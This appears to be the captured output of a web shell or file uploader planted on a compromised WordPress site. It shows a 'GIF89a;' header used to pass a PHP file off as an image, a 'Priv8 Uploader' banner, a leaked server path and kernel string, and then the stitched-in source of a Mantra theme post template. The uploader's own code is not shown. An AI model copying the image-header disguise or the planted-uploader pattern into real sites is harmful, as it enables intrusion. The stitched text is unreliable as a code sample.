GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
/**
* The default template for displaying content
*
* @package Cryout Creations
* @subpackage Mantra
* @since Mantra 1.0
*/
$options= mantra_get_theme_options();
foreach ($options as $key => $value) {
${"$key"} = $value ;
}
?>
<article id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
<header class="entry-header">
<?php if ( is_sticky() ) : ?>
<hgroup>
<h2 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'mantra' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h2>
</hgroup>
<?php else : ?>
<h1 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'mantra' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h1>
<?php endif; ?>
<?php if ( 'post' == get_post_type() ) : ?>
<div class="entry-meta">
<?php if ( is_sticky() ) { ?> <h3 class="entry-format"><?php _e( 'Featured', 'mantra' ); ?></h3> <?php } ?>
<?php mantra_posted_on(); ?>
<?php /* if ( comments_open() && ! post_password_required() ) :*/ ?>
<div class="comments-link">
<?php mantra_comments_on(); ?>
</div>
<?php /* endif; */ ?>
</div><!-- .entry-meta -->
<?php endif; ?>
</header><!-- .entry-header -->
<?php if ( is_archive() || is_search() ) : // Display excerpts for archives and search. ?>
<?php if ($mantra_excerptarchive != "Full Post" ){ ?>
<div class="entry-summary">
<?php set_featured_thumb(); ?>
<?php the_excerpt(); ?>
</div><!-- .entry-summary -->
<?php } else { ?>
<div class="entry-content">
<?php set_featured_thumb(); ?>
<?php the_content(); ?>
<?php wp_link_pages( array( 'before' => '<div class="page-link"><span>' . __( 'Pages:', 'mantra' ) . '</span>', 'after' => '</div>' ) ); ?>
</div><!-- .entry-content -->
<?php } ?>
<?php else : ?>
<?php if ($mantra_excerpthome != "Full Post" ){ ?>
<div class="entry-summary">
<?php set_featured_thumb(); ?>
<?php the_excerpt(); ?>
</div><!-- .entry-summary -->
<?php } else { ?>
<div class="entry-content">
<?php set_featured_thumb(); ?>
<?php the_content(); ?>
<?php wp_link_pages( array( 'before' => '<div class="page-link"><span>' . __( 'Pages:', 'mantra' ) . '</span>', 'after' => '</div>' ) ); ?>
</div><!-- .entry-content -->
<?php } ?>
<?php endif; ?>
<footer class="entry-meta2">
<?php $tag_list = get_the_tag_list( '', ', ' );
if ( $tag_list ) { ?>
<span class="bl_tagg"><?php _e( 'Tagged','mantra'); print ' '.$tag_list; ?></span>
<?php } ?>
<?php edit_post_link( __( 'Edit', 'mantra' ), '<span class="edit-link">', '</span>' ); ?>
</footer><!-- #entry-meta -->
</article><!-- #post-<?php the_ID(); ?> -->